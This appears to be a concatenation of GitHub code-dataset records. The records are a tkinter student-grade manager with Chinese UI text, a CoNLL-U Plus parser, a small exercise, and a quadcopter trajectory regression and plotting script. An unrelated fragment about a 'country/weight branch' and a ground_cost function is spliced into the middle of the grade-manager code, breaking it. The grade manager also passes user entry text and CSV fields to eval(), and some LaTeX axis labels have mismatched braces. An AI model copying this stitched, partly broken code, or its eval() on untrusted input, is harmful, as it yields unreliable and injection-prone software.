messagebox.showinfo('系统提示', '登录成功!')\n            self.root.destroy()\n            MainWindow()\n        else:\n            messagebox.showinfo('系统提示', '登录失败')\n\n\n# Main window\n\nclass MainWindow(object):\n    def __init__(self):\n        self.root = tkinter.Tk()\n        self.root.title(\"学生成绩分析系统\")\n        self.root.geometry('800x550')\n        self.setup_UI()\n        self.load_file_student_info()\n        self.load_treeview(self.all_student_list)\n\n    def setup_UI(self):\n        # Configure Style\n        self.Style01 = Style()\n        self.Style01.configure(\"left.TPanedwindow\", background=\"deepskyblue\")\n        self.Style01.configure(\"right.TPanedwindow\", background=\"deepskyblue\")\n        self.Style01.configure(\"TButton\", width=10, font=(\"华文黑体\", 13, \"bold\"))\n\n        # Left side: the button area, create a container for it\n        self.Pane_left = PanedWindow(width=160, height=540, style=\"left.TPanedwindow\")\n        
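The country/weight branch above reduces to a bracket lookup with a per-pound overage fallback. A plain-data sketch of that rule (the bracket values are invented for illustration, not taken from any rate card):

brackets = [(0, 10, 5.0),    # (from_weight, to_weight, flat charge)
            (10, 50, 12.0)]
over = (50, 12.0, 0.30)      # (from_weight, base charge, cost per pound over)

def ground_cost(weight):
    for lo, hi, charge in brackets:
        if lo <= weight < hi:
            return charge
    base_weight, base_charge, per_lb = over
    return base_charge + (weight - base_weight) * per_lb

print(ground_cost(7), ground_cost(60))  # 5.0 15.0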
self.Pane_left.place(x=4, y=10)\n        self.Pane_right = PanedWindow(width=700, height=540, style=\"right.TPanedwindow\")\n        self.Pane_right.place(x=210, y=10)\n\n        # Add the left-side buttons\n        self.Button_add = Button(self.Pane_left, text=\"添加学生\", style=\"TButton\",command = Add)\n        self.Button_add.place(x=20, y=20)\n        self.Button_delete = Button(self.Pane_left, text=\"删除学生\", style=\"TButton\",command = Delete)\n        self.Button_delete.place(x=20, y=50)\n        self.Button_max = Button(self.Pane_left, text=\"最高分\", style=\"TButton\",command = self.sort_1)\n        self.Button_max.place(x=20, y=80)\n        self.Button_min = Button(self.Pane_left, text=\"最低分\", style=\"TButton\",command = self.sort_2)\n        self.Button_min.place(x=20, y=110)\n        self.Button_avg = Button(self.Pane_left, text=\"单科平均分\", style=\"TButton\",command = self.avg_sub)\n        self.Button_avg.place(x=20, y=140)\n        self.Button_ave = Button(self.Pane_left, text=\"单人平均分\", style=\"TButton\", command=self.ave_sub)\n        self.Button_ave.place(x=20, y=170)\n        self.Button_sum = Button(self.Pane_left, text=\"总分\", style=\"TButton\",command = self.sum)\n        self.Button_sum.place(x=20, y=200)\n        self.Button_pic = Button(self.Pane_left, text=\"分析图\", style=\"TButton\",command = view_win)\n        self.Button_pic.place(x=20, y=230)\n\n        # Right-side query interface\n        self.Pane_right = PanedWindow(width=720, height=540, style=\"right.TPanedwindow\")\n        self.Pane_right.place(x=170, y=10)\n        # LabelFrame\n        self.LabelFrame_query = LabelFrame(self.Pane_right, text=\"学生信息显示\", width=620, height=60)\n        self.LabelFrame_query.place(x=10, y=10)\n        # Add widgets\n        self.Label_sno = Label(self.LabelFrame_query, text=\"欢迎登录学生成绩分析系统\")\n        self.Label_sno.place(x=5, y=13)\n\n        # self.var_sno = StringVar()\n        # self.Entry_sno = Entry(self.LabelFrame_query, width=8, textvariable=self.var_sno)\n        # self.Entry_sno.place(x=40, y=10)\n\n        # self.Button_query = Button(self.LabelFrame_query, text=\"查询\", width=4)\n        # self.Button_query.place(x=450, y=10)\n        # self.Button_all = Button(self.LabelFrame_query, text=\"显示全部\", width=8)\n        # self.Button_all.place(x=510, y=10)\n\n        self.Tree = Treeview(self.Pane_right, columns=(\"sno\", \"math\", \"english\", \"python\"),\n                             show=\"headings\", height=20)\n\n        # Set each column's width and alignment\n        self.Tree.column(\"sno\", width=150, anchor=\"center\")\n        self.Tree.column(\"math\", width=150, anchor=\"center\")\n        self.Tree.column(\"english\", width=150, anchor=\"center\")\n        self.Tree.column(\"python\", width=150, anchor=\"center\")\n\n        # Set each column's heading\n        self.Tree.heading(\"sno\", text=\"学号\")\n        self.Tree.heading(\"math\", text=\"高数\")\n        self.Tree.heading(\"english\", text=\"英语\")\n        self.Tree.heading(\"python\", text=\"python\")\n        self.Tree.place(x=10, y=80)\n\n        self.all_student_list = []\n        self.file_path = \"student_score - 副本.csv\"\n        # Read the file\n\n    def load_file_student_info(self):\n        if not os.path.exists(self.file_path):\n            showinfo(\"系统消息\", \"提供的文件名不存在!\")\n        else:\n            try:\n                with open(file=self.file_path, mode=\"r\") as fd:\n                    # read one line at a time\n                    current_line = fd.readline()\n                    while current_line:\n                        temp_list = current_line.split(\",\") # split the long string into fields\n                        self.all_student_list.append(temp_list)\n                        # read the next line; the loop ends when the file is exhausted\n                        current_line = fd.readline()\n            except:\n                showinfo(\"系统消息\", \"文件读取出现异常!\")\n\n    # Search feature that should have lived inside this window; abandoned as unworkable\n    # # Search feature\n    # self.query_result_list = []\n    #\n    # def get_query_result(self):\n    #     # Prepare the query condition: get the student id\n    #     query_condition = self.Entry_sno.get()\n    #     # Iterate the list to find matching students\n    #     for item in self.all_student_list:\n    #         if query_condition in item[0]:\n    #             # students that match the condition\n    #             self.query_result_list.append(item)\n    #     # load the results into the TreeView\n    #     self.load_treeview(self.query_result_list)\n\n    # def load_all_student(self):\n    #     # load all student info into the treeview\n    #     self.load_treeview(self.all_student_list)\n\n    # Load the data into the 2-D list\n    def load_treeview(self, current_list: list):\n        # Check whether there is any data:\n        if len(current_list) == 0:\n            showinfo(\"系统消息\", \"没有数据加载\")\n        else:\n            for index in range(len(current_list)):\n                self.Tree.insert(\"\", index, values=(current_list[index][0], current_list[index][1],\n                                                    current_list[index][2], current_list[index][3],\n                                                    ))\n            self.Tree = Treeview(self.Pane_right, columns=(\"sno\", \"math\", \"english\", \"python\"),\n                                 show=\"headings\", height=40)\n\n\n    # Sort, then show the highest scores\n    def sort_1(self):\n        win_sort = tkinter.Tk()\n        win_sort.geometry('300x110')\n        win_sort.title(\"最高分\")\n        # sort\n        score_01.sort()\n        score_02.sort()\n        score_03.sort()\n        # print the highest scores\n        label_math = Label(win_sort, text=\"高数最高分为{}\".format(score_01[len(score_01) - 1]))\n        label_math.pack()\n        label_english = Label(win_sort, text=\"英语最高分为{}\".format(score_02[len(score_02) - 1]))\n        label_english.pack()\n        label_py = Label(win_sort, text=\"python最高分为{}\".format(score_03[len(score_03) - 1]))\n        label_py.pack()\n        win_sort.mainloop()\n\n\n    # Sort, then show the lowest scores\n    def sort_2(self):\n        win_sort = tkinter.Tk()\n        win_sort.geometry('300x110')\n        win_sort.title(\"最低分\")\n        # sort\n        score_01.sort()\n        score_02.sort()\n        score_03.sort()\n        # print the lowest scores\n        label_math = Label(win_sort, text=\"高数最低分为{}\".format(score_01[0]))\n        label_math.pack()\n        label_english = Label(win_sort, text=\"英语最低分为{}\".format(score_02[0]))\n        label_english.pack()\n        label_py = Label(win_sort, text=\"python最低分为{}\".format(score_03[0]))\n        label_py.pack()\n        win_sort.mainloop()\n\n\n    # Averages\n    # Per-subject average\n    def avg_sub(self):\n        win_ave_subject = tkinter.Tk()\n        win_ave_subject.geometry('300x110')\n        win_ave_subject.title(\"平均分\")\n        num_ave_subject1 = 0\n        num_ave_subject2 = 0\n        num_ave_subject3 = 0\n        for i in range(len(score)):\n            num_ave_subject1 = num_ave_subject1 + eval(score[i][1])\n        for i in range(len(score)):\n            num_ave_subject2 = num_ave_subject2 + eval(score[i][2])\n        for i in range(len(score)):\n            num_ave_subject3 = num_ave_subject3 + eval(score[i][3])\n        label1 = Label(win_ave_subject, text=\"高数的平均分为{:.2f}\".format(num_ave_subject1 / len(score)))\n        label1.pack()\n        label2 = Label(win_ave_subject, text=\"英语的平均分为{:.2f}\".format(num_ave_subject2 / len(score)))\n        label2.pack()\n        label3 = Label(win_ave_subject, text=\"python的平均分为{:.2f}\".format(num_ave_subject3 / len(score)))\n        label3.pack()\n        win_ave_subject.mainloop()\n\n    # Per-student average\n    def ave_sub(self):\n        win_ave_student = tkinter.Tk()\n        win_ave_student.geometry('250x800')\n        win_ave_student.title(\"平均分\")\n        for i in range(len(score)):\n            num_01 = \"%.2f\" % ((eval(score[i][1]) + eval(score[i][2]) + eval(score[i][3])) / 3)\n            label = Label(win_ave_student, text=\"学号为{}的同学,平均分为:\".format(score[i][0]) + num_01)\n            label.pack()\n        win_ave_student.mainloop()\n\n\n    # Total-score calculation\n    def sum(self):\n        win_generalPoints = tkinter.Tk()\n        win_generalPoints.geometry('200x600')\n        win_generalPoints.title(\"总分\")\n        for i_points in range(len(score)):\n            num_01 = \"%.2f\" % (eval(score[i_points][1]) + eval(score[i_points][2]) + eval(score[i_points][3]))\n            label = Label(win_generalPoints, text=\"{}的总分为:\".format(score[i_points][0]) + num_01)\n            label.pack()\n        win_generalPoints.mainloop()\n\n\n# Grade visualisation\ndef view(x_view):\n    num_view1 = 0 # excellent\n    num_view2 = 0 # good\n    num_view3 = 0 # fair\n    num_view4 = 0 # fail\n\n    for i_view in range(len(x_view)):\n        if 95 <= x_view[i_view] <= 100:\n            num_view1 = num_view1 + 1\n            continue\n        if 80 <= x_view[i_view] <= 94:\n            num_view2 = num_view2 + 1\n            continue\n        if 60 <= x_view[i_view] <= 79:\n            num_view3 = num_view3 + 1\n            continue\n        if x_view[i_view] < 60:\n            num_view4 = num_view4 + 1\n            continue\n\n    num_view1 = float(\"%.2f\" % (num_view1 / len(x_view) * 100))\n    num_view2 = float(\"%.2f\" % (num_view2 / len(x_view) * 100))\n    num_view3 = float(\"%.2f\" % (num_view3 / len(x_view) * 100))\n    num_view4 = float(\"%.2f\" % (100 - num_view1 - num_view2 - num_view3))\n\n    labels = 'excellent', 'good', 'pass', 'fail'\n    sizes = [num_view1, num_view2, num_view3, num_view4]\n    fig1, (ax1) = plt.subplots(1)\n    ax1.pie(sizes, labels=labels, autopct='%1.1f%%')\n    ax1.axis('equal')\n    plt.show()\n\ndef view_02(x_view):\n    num_view1 = 0 # excellent\n    num_view2 = 0 # good\n    num_view3 = 0 # fair\n    num_view4 = 0 # fail\n\n    for i_view in range(len(x_view)):\n        if 261 <= x_view[i_view] <= 300:\n            num_view1 = num_view1 + 1\n            continue\n        if 241 <= x_view[i_view] <= 260:\n            num_view2 = num_view2 + 1\n            continue\n        if 221 <= x_view[i_view] <= 240:\n            num_view3 = num_view3 + 1\n            continue\n        if x_view[i_view] < 200:\n            num_view4 = num_view4 + 1\n            continue\n\n    num_view1 = float(\"%.2f\" % (num_view1 / len(x_view) * 100))\n    num_view2 = float(\"%.2f\" % (num_view2 / len(x_view) * 100))\n    num_view3 = float(\"%.2f\" % (num_view3 / len(x_view) * 100))\n    num_view4 = float(\"%.2f\" % (100 - num_view1 - num_view2 - num_view3))\n\n    # labels = 'excellent', 'good', 'fair', 'fail'\n    labels = 'A', 'B', 'C', 'D'\n    sizes = [num_view1, num_view2, num_view3, num_view4]\n    fig1, (ax1) = plt.subplots(1)\n    ax1.pie(sizes, labels=labels, autopct='%1.1f%%', shadow=True)\n    ax1.axis('equal')\n    plt.show()\n\n# Math chart\ndef view1():\n    view(score_01)\n\n# English chart\ndef view2():\n    view(score_02)\n\n# Python chart\ndef view3():\n    view(score_03)\n\n# Total-score chart\ndef view4():\n    # view_02 bands per-student totals, so pass the totals rather than the raw rows\n    view_02([eval(r[1]) + eval(r[2]) + eval(r[3]) for r in score])\n\n# Chart window\ndef view_win():\n    # Create a window\n    win_view = tkinter.Tk()\n    win_view.title(\"分析图\")\n    win_view.geometry('200x150')\n    button1_view = Button(win_view, text=\"高数\",command=view1)\n    button2_view = Button(win_view, text=\"英语\",command=view2)\n    button3_view = Button(win_view, text=\"python\", command=view3)\n    button4_view = Button(win_view, text=\"总分\", command=view4)\n\n    button1_view.pack()\n    button2_view.pack()\n    button3_view.pack()\n    button4_view.pack()\n    win_view.mainloop()\n\n# Feature for adding another student's grades\ndef Add():\n    window = tkinter.Tk()\n    window.title(\"增加学生\")\n    frame = Frame(window)\n    frame.pack(padx=8, pady=8, ipadx=4)\n\n    lab1 = Label(frame, text=\"学号\")\n    lab1.grid(row=0, column=0, padx=5, pady=5)\n\n    lab2 = Label(frame, text=\"高数\")\n    lab2.grid(row=1, column=0, padx=5, pady=5)\n\n    lab3 = Label(frame, text=\"英语\")\n    lab3.grid(row=2, column=0, padx=5, pady=5)\n\n    lab4 = Label(frame, text=\"python\")\n    lab4.grid(row=3, column=0, padx=5, pady=5)\n\n    lab5 = Label(frame, text=\"结果\")\n    lab5.grid(row=4, column=0, padx=5, pady=5)\n\n    # Bind variables to the Entry widgets\n\n    p1 = StringVar(master=window)\n    ent1 = Entry(frame, textvariable=p1)\n    ent1.grid(row=0, column=1)\n\n    p2 = StringVar(master=window)\n    ent2 = Entry(frame, textvariable=p2)\n    ent2.grid(row=1, column=1)\n\n    p3 = StringVar(master=window)\n    ent3 = Entry(frame, textvariable=p3)\n    ent3.grid(row=2, column=1)\n\n    p4 = StringVar(master=window)\n    ent4 = Entry(frame, textvariable=p4)\n    ent4.grid(row=3, column=1)\n\n    p5 = StringVar(master=window)\n    ent5 = Entry(frame, textvariable=p5)\n    ent5.grid(row=4, column=1, sticky='ew', columnspan=2)\n\n    def submit():\n        num = 0 # flag recording whether the student id already exists\n        for i in range(len(score)):\n            if eval(p1.get()) == eval(score[i][0]):\n                num = 1\n                p5.set(\"添加失败\")\n        if num == 0:\n            
student = [p1.get(), p2.get(), p3.get(), p4.get()]\n            score.append(student)\n            close_csv()\n            p5.set(\"添加成功\")\n\n    button = Button(frame, text=\"提交\", command=submit)\n    button.grid(row=5, column=1)\n    window.mainloop()\n\n# Delete a student's grades\ndef Delete():\n    window2 = tkinter.Tk()\n    window2.title(\"删除成绩\")\n    window2.geometry('300x120')\n    frame = Frame(window2)\n    frame.pack(padx=8, pady=8, ipadx=4)\n    lab1 = Label(frame, text=\"学号\")\n    lab1.grid(row=0, column=0, padx=5, pady=5)\n    lab2 = Label(frame, text=\"结果\")\n    lab2.grid(row=1, column=0, padx=5, pady=5)\n    # Bind variables to the Entry widgets\n\n    p1 = StringVar(master=window2)\n    ent1 = Entry(frame, textvariable=p1)\n    ent1.grid(row=0, column=1)\n\n    p2 = StringVar(master=window2)\n    ent2 = Entry(frame, textvariable=p2)\n    ent2.grid(row=1, column=1)\n\n    def submit():\n        num = 0\n        for a in range(len(score)):\n            if eval(score[a][0]) == eval(ent1.get()):\n                del score[a]\n                num = 1\n                p2.set(\"删除成功\")\n                close_csv()\n                break\n        if num == 0:\n            p2.set(\"查无此学生\")\n\n    button = Button(frame, text=\"提交\", command=submit)\n    button.grid(row=5, column=1)\n    window2.mainloop()\n\n# Read the file and keep its rows in a list\n# Read the file\nwith open(\"student_score - 副本.csv\", \"r\",encoding='utf-8') as f:\n    score_01 = []\n    score_02 = []\n    score_03 = []\n    reader = csv.reader(f)\n    # load the file into the list\n    score = [row for row in reader]\n    for i in range(len(score)):\n        score_01.append(eval(score[i][1]))\n        score_02.append(eval(score[i][2]))\n        score_03.append(eval(score[i][3]))\n# Write the list back to the csv on close\ndef close_csv():\n    with open(\"student_score - 副本.csv\", 'w', encoding='utf-8') as f:  # match the utf-8 read above\n        for item in score:\n            f.write(','.join(item) + '\\n')\n\ndef main():\n    # Initialize the object\n    L = Login()\n    # Lay out the widgets\n    L.gui_arrang()\n    # Run the main loop\n    tkinter.mainloop()\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"eligous/student_manage_system-test","sub_path":"big_homework.py","file_name":"big_homework.py","file_ext":"py","file_size_in_byte":18440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34739010187","text":"import sys\nimport os\n\n\nclass Token(object):\n    def __init__(self, index=-1, word=\"_\", lemma=\"_\", upos=\"_\", xpos=\"_\", feats=\"_\", head=\"_\", deprel=\"_\", deps=\"_\",\n                 misc=\"_\", parseme_mwe=\"_\"):\n        self.index, self.is_compound_entry = self._int_try_parse(index)\n        self.word = word\n        self.lemma = lemma\n        self.upos = upos\n        self.xpos = xpos\n        self.feats = feats\n        self.head, _ = self._int_try_parse(head)\n        self.deprel = deprel\n        self.deps = deps\n        self.misc = misc\n        self.parseme_mwe = parseme_mwe\n\n    def _int_try_parse(self, value):\n        try:\n            return int(value), False\n        except ValueError:\n            return value, True\n\n\nclass CONLLUPSentence(object):\n    def __init__(self, id=None, tokens=None):\n        self.tokens = []\n        self.id = id\n        if tokens != None:\n            self.tokens = tokens\n\n    def __repr__(self):\n        sentence = \"\"\n        for token in self.tokens:\n            sentence += token.word\n            if not \"SpaceAfter=No\" in token.misc:\n                sentence += \" \"\n        return sentence\n\n    def to_text(self):\n        lines = []\n        if self.id != None:\n            lines.append(\"# sent_id = {}\\n\".format(self.id))\n        lines.append(\"# text = {}\\n\".format(self))\n        for token in self.tokens:\n            lines.append(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(\n                token.index,\n                token.word,\n                token.lemma,\n                token.upos,\n                token.xpos,\n                token.feats,\n                token.head,\n                token.deprel,\n                token.deps,\n                token.misc,\n                token.parseme_mwe\n            ))\n        return lines\n\n\ndef read_file(filename):\n    with open(filename, \"r\", encoding=\"utf8\") as f:\n        lines = f.readlines()\n    dataset = []\n    tokens = 
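The banding logic inside view() above, separated from the plotting so it can be tested directly; the last band absorbs rounding error exactly as the original does:

def band_percentages(scores):
    bands = {"excellent": (95, 100), "good": (80, 94), "pass": (60, 79)}
    pct = {name: round(100 * sum(lo <= s <= hi for s in scores) / len(scores), 2)
           for name, (lo, hi) in bands.items()}
    pct["fail"] = round(100 - sum(pct.values()), 2)  # remainder, as in the original
    return pct

print(band_percentages([98, 85, 72, 55]))  # {'excellent': 25.0, 'good': 25.0, 'pass': 25.0, 'fail': 25.0}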
[]\n\n    for line in lines:\n        if line.startswith(\"#\"):\n            if \"sent_id\" in line:\n                sentence_id = line.replace(\"# sent_id = \", \"\").strip()\n                tokens = []\n                continue\n            continue\n\n        if line.strip() == \"\":\n            if len(tokens) > 0:\n                dataset.append(CONLLUPSentence(id=sentence_id, tokens=tokens))\n            continue\n\n        parts = line.strip().split(\"\\t\")\n        if len(parts) != 11:\n            print(\"ERROR processing line: [\" + line.strip() + \"], not a valid conllup format!\")\n            sys.exit(1)  # exit with a non-zero status on malformed input\n\n        token = Token(index=int(parts[0]), word=parts[1], lemma=parts[2], upos=parts[3], xpos=parts[4], feats=parts[5],\n                      head=parts[6], deprel=parts[7], deps=parts[8], misc=parts[9], parseme_mwe=parts[10])\n        tokens.append(token)\n\n    return dataset\n\n\ndef write_file(output_path, conllupdataset):\n    if not os.path.exists(output_path):\n        os.makedirs(output_path)\n\n    conllup_file_handle = open(os.path.join(output_path, \"output.conllup\"), \"w\", encoding='utf-8')\n    conllup_file_handle.write(\"# global.columns = ID FORM LEMMA UPOS XPOS FEATS HEAD DEPREL DEPS MISC PARSEME:MWE\\n\")\n    for sentence_id, sentence in enumerate(conllupdataset):\n        for line in sentence.to_text():\n            conllup_file_handle.write(line)\n        conllup_file_handle.write(\"\\n\")\n    conllup_file_handle.close()\n\n\ndef extract_entities(conllup_sentences):\n    all_sen_entity_list = list()\n\n    for sentence in conllup_sentences:\n        sen_entity_list = list()\n        entity_pos = list()\n        past_entity = None\n\n        for token in sentence.tokens:\n            entity = token.parseme_mwe\n\n            if \":\" in entity:\n                if len(entity_pos) > 0 and past_entity is not None:\n                    sen_entity_list.append((entity_pos, past_entity))\n\n                entity_pos = list()\n                entity_pos.append(token.index)\n                past_entity = entity[2:]\n            elif entity != \"*\":  # was 'is not \"*\"'; identity comparison on string literals is unreliable\n                entity_pos.append(token.index)\n\n        if past_entity is not None:\n            sen_entity_list.append((entity_pos, past_entity))\n\n        all_sen_entity_list.append(sen_entity_list)\n\n    return all_sen_entity_list\n","repo_name":"avramandrei/Information-Extraction-Romanian","sub_path":"utils/conllup.py","file_name":"conllup.py","file_ext":"py","file_size_in_byte":4190,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"9582646663","text":"def funcao_c(x, y):\n    m = 0\n    while not x + m > y:\n        m += 1\n    return m\n\nrm = input('Enter your RM: ')\n# sample RM: 'rm553759'; the indexing below expects just the digits, e.g. '553759'\nresultado = funcao_c(int(rm[-1]), int(rm[0]))\nprint(resultado)\n","repo_name":"leooli-321/FIAP","sub_path":"Primeiro-semestre/#2 Computational Thinking Using Python/Atividades/CP3/ex4.py","file_name":"ex4.py","file_ext":"py","file_size_in_byte":189,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"25703569181","text":"import math\n\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# Restore the default plotting style.\nmpl.rcdefaults()\n\n# Specify the plotting style.\n# Figure Settings\n# DPI\nmpl.rcParams[\"figure.dpi\"] = 600\n# Layout\n# mpl.rcParams[\"figure.constrained_layout.use\"]: True\n# Size Constraints\n# Paper Size\npaper_size = [21.0, # W (cm)\n              29.7] # H (cm)\n# Margins\nplr_margins = [2.5, # L (cm)\n               2.5] # R (cm)\n# Width\ngraph_width = (paper_size[0] - plr_margins[0] - plr_margins[1]) / 2.54\n# Size\nmpl.rcParams[\"figure.figsize\"] = [graph_width, graph_width *\n                                  # Paper Aspect Ratio\n                                  paper_size[0] / paper_size[1]]\n# Marker\nmpl.rcParams[\"scatter.marker\"] = \".\"\n# Marker Radius\n# 0.3 mm\nmpl.rcParams[\"lines.markersize\"] = (0.3 * (mpl.rcParams[\"figure.dpi\"] / 25.4)) ** 2\n# 
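One CoNLL-U Plus line through the Token path above: eleven tab-separated columns with the PARSEME:MWE tag last. The sample line is invented:

line = "1\tkicked\tkick\tVERB\tVBD\t_\t0\troot\t_\t_\t1:VID"
parts = line.split("\t")
assert len(parts) == 11
token = Token(index=int(parts[0]), word=parts[1], lemma=parts[2], upos=parts[3],
              xpos=parts[4], feats=parts[5], head=parts[6], deprel=parts[7],
              deps=parts[8], misc=parts[9], parseme_mwe=parts[10])
print(token.word, token.parseme_mwe)  # kicked 1:VID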
Line Width\n# 0.1 mm\nmpl.rcParams[\"lines.linewidth\"] = 0.1 * math.sqrt(mpl.rcParams[\"lines.markersize\"])\n# LaTeX Compiler Settings\nmpl.rcParams[\"text.usetex\"] = True\n# Font\nmpl.rcParams[\"font.family\"] = \"Computer Modern Roman\"\n# Font Size\n# Global\nmpl.rcParams[\"font.size\"] = 10\n# Titles\nmpl.rcParams[\"axes.titlesize\"] = 10\n# Label Ticks\nmpl.rcParams[\"xtick.labelsize\"] = 8\nmpl.rcParams[\"ytick.labelsize\"] = 8\n# Preamble\nmpl.rcParams[\"text.latex.preamble\"] = \"\\\\usepackage{siunitx}\"\n# Writer Settings\n# Whitespace\nmpl.rcParams[\"savefig.bbox\"] = \"tight\"\n# Alpha Channel\nmpl.rcParams[\"savefig.transparent\"] = True\n\n\n# Enable this command if you encounter any graphics-related issues.\n# mpl.rcParams.update(mpl.rcParamsDefault)\n\n\ndef build_independent_variable_matrix(dependent_variable_matrix: np.ndarray, model_order: int) -> np.ndarray:\n \"\"\"\n Constructs the independent variable matrix of the regression model based on its desired order.\n\n Args:\n dependent_variable_matrix:\n The dependent variable matrix of the model.\n model_order:\n The order of the model.\n\n Returns:\n The independent variable matrix of the model.\n \"\"\"\n return np.array(\n [[x ** n for n in range(model_order + 1)] for x in range(1, len(dependent_variable_matrix) + 1)]).reshape(\n len(dependent_variable_matrix), -1)\n\n\ndef build_weight_matrix(dependent_variable_matrix: np.ndarray, model_order: int) -> np.ndarray:\n \"\"\"\n Constructs an initial, non-optimal weight matrix of the regression model based on its desired order.\n\n Args:\n dependent_variable_matrix:\n The dependent variable matrix of the model.\n model_order:\n The order of the model.\n\n Returns:\n The weight matrix of the model.\n \"\"\"\n # The initialization values have been chosen arbitrarily.\n return np.ones((model_order + 1, dependent_variable_matrix.shape[1]))\n\n\ndef subplot(ax, dependent_variable_matrix, independent_variable_matrix):\n # Scatter the observed positions.\n p = ax.scatter(dependent_variable_matrix[:, 0], dependent_variable_matrix[:, 1], dependent_variable_matrix[:, 2],\n alpha=1, c=list(range(1, len(dependent_variable_matrix) + 1)),\n cmap=plt.get_cmap('viridis', len(independent_variable_matrix)),\n # This parameter is required when using Axes3D.\n s=mpl.rcParams[\"lines.markersize\"])\n # Plot the observed trajectory.\n ax.plot(dependent_variable_matrix[:, 0], dependent_variable_matrix[:, 1], dependent_variable_matrix[:, 2],\n c=\"#000000\")\n # Set the primary axis labels.\n ax.set_xlabel(r\"\\textbf{X} (\\si{\\meter)\")\n ax.set_ylabel(r\"\\textbf{Y} (\\si{\\meter)\")\n ax.set_zlabel(r\"\\textbf{Z} (\\si{\\meter)\")\n return p\n\n\ndef plot_model(filename: str, dependent_variable_matrix: np.ndarray, independent_variable_matrix: np.ndarray) -> None:\n \"\"\"\n Generates a plot of the regression model and saves the corresponding figure to disk.\n\n Args:\n filename:\n The relative or absolute output file path.\n dependent_variable_matrix:\n The dependent variable matrix of the model.\n independent_variable_matrix:\n The independent variable matrix of the model.\n \"\"\"\n # Visualize the observed trajectory of the quadrocopter.\n # Create a 2x2 array of 3D subplots.\n fig, axs = plt.subplots(2, 2, subplot_kw={'projection': '3d'})\n # Specify the padding.\n # NOTE - Do not change the value of this parameter!\n plt.subplots_adjust(wspace=0.5, hspace=0.5)\n # Generate each subplot.\n for ax, i in zip(axs.flat, [0, 1, 2, 3]):\n # Set the camera to an isometric view.\n 
ax.view_init(azim=45 + i * 90, elev=math.degrees(math.asin(1 / math.sqrt(3))))\n # ax.set_box_aspect(aspect=None, zoom=0.9)\n\n sp = subplot(ax, dependent_variable_matrix, independent_variable_matrix)\n # Add a label specifying the azimuth of the camera.\n ax.set_title(r\"$\\alpha = {}$\".format(45 + i * 90) + r\"\\si{\\degree}\")\n # Add a common color bar to display time information.\n cb = plt.colorbar(sp, ax=axs.flat, label=r\"\\textbf{Time} (\\si{\\second})\",\n # NOTE - Do not change the value of this parameter!\n pad=0.2,\n # NOTE - Do not change the value of this parameter!\n ticks=1 + (np.arange(len(independent_variable_matrix)) + 0.5) * (\n len(independent_variable_matrix) - 1) / len(independent_variable_matrix))\n # Set the tick labels\n cb.ax.set_yticklabels(list(range(1, len(independent_variable_matrix) + 1)))\n # Hide the vertical axis ticks.\n cb.ax.axes.tick_params(length=0)\n\n plt.savefig(filename)\n\n\ndef objective(dependent_variable_matrix: np.ndarray, independent_variable_matrix: np.ndarray,\n weight_matrix: np.ndarray) -> float:\n \"\"\"\n Evaluates the objective function of the underlying optimization problem.\n\n Args:\n dependent_variable_matrix:\n The dependent variable matrix of the regression model.\n independent_variable_matrix:\n The independent variable matrix of the regression model.\n weight_matrix:\n The weight matrix of the regression model.\n\n Returns:\n The value of the objective function.\n \"\"\"\n # noinspection PyTypeChecker\n return np.sum((dependent_variable_matrix - independent_variable_matrix @ weight_matrix) ** 2)\n\n\ndef objective_gradient(dependent_variable_matrix: np.ndarray, independent_variable_matrix: np.ndarray,\n weight_matrix: np.ndarray) -> np.ndarray:\n \"\"\"\n Evaluates the gradient of the objective function of the underlying optimization problem.\n\n Args:\n dependent_variable_matrix:\n The dependent variable matrix of the regression model.\n independent_variable_matrix:\n The independent variable matrix of the regression model.\n weight_matrix:\n The weight matrix of the regression model.\n\n Returns:\n The gradient of the objective function.\n \"\"\"\n return 2 * independent_variable_matrix.T @ (independent_variable_matrix @ weight_matrix - dependent_variable_matrix)\n\n\ndef gradient_descent(gradient, dependent_variable_matrix: np.ndarray, independent_variable_matrix: np.ndarray,\n weight_matrix: np.ndarray, learning_rate: float = 1e-5, iter_eps: float = 1e+10,\n step_eps: float = 1e-15) -> None:\n \"\"\"\n Estimates the optimal weight matrix of the regression model by solving the underlying optimization problem.\n\n Args:\n gradient:\n The gradient of the objective function of the problem.\n dependent_variable_matrix:\n The dependent variable matrix of the regression model.\n independent_variable_matrix:\n The independent variable matrix of the regression model.\n weight_matrix:\n The weight matrix of the regression model.\n learning_rate:\n The learning rate.\n iter_eps:\n The maximum allowed number of iterations.\n step_eps:\n The minimum allowed iteration step.\n\n Note:\n This function modifies the weight matrix of the regression model!\n \"\"\"\n for _ in range(int(iter_eps)):\n step = learning_rate * gradient(dependent_variable_matrix, independent_variable_matrix, weight_matrix)\n if np.amax(np.abs(step)) < step_eps:\n break\n weight_matrix -= step\n\n\ndef main():\n # Dependent Variable Matrix\n X = np.array(\n [[+2.00, +0.00, +1.00], [+1.08, +1.68, +2.38], [-0.83, +1.82, +2.49], [-1.97, +0.28, +2.15],\n [-1.31, 
-1.51, +2.59],\n [+0.57, -1.91, +4.32]])\n\n # Linear Model - Constant Speed\n T1 = build_independent_variable_matrix(X, 1)\n W1 = build_weight_matrix(X, 1)\n\n plot_model(\"observedQuadcopterTrajectory\", X, build_independent_variable_matrix(X, 1))\n\n gradient_descent(objective_gradient, X, T1, W1)\n print(\"Linear Model - Optimal Model Weights:\\n\", W1)\n print(\"Linear Model - Residual Error:\\n\", objective(X, T1, W1))\n\n print('Linear Model - Speed:\\n', np.linalg.norm(W1[1, :]))\n\n # Quadratic Model - Constant Acceleration\n T2 = build_independent_variable_matrix(X, 2)\n W2 = build_weight_matrix(X, 2)\n\n gradient_descent(objective_gradient, X, T2, W2)\n print(\"Quadratic Model - Optimal Model Weights:\\n\", W2)\n print(\"Quadratic Model - Residual Error:\\n\", objective(X, T2, W2))\n\n next_timestep = np.array([1, 7, 49])\n print('Quadratic Model - Next Position:\\n', next_timestep @ W2)\n\n plot_model(\"estimatedQuadcopterTrajectory\", np.vstack((T2, next_timestep)) @ W2, np.vstack((T2, next_timestep)))\n\n\nif __name__ == 